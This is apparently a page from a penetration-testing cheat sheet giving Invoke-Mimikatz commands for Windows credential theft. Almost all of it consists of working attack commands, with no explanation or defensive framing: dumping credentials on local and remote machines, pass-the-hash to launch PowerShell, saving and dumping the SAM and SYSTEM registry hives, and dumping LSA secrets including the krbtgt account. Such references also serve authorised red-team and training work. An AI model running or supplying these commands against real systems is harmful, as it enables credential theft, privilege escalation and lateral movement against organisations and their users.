Invoke-MimiKatz

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")

Mimikatz start powershell pass the hash (run as local admin)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'

Mimikatz dump from SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hiv

Mimikatz dump lsa (krbtgt to)

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

PreviousPowerShell Remoting NextCrackMapExec

Last updated 9 months ago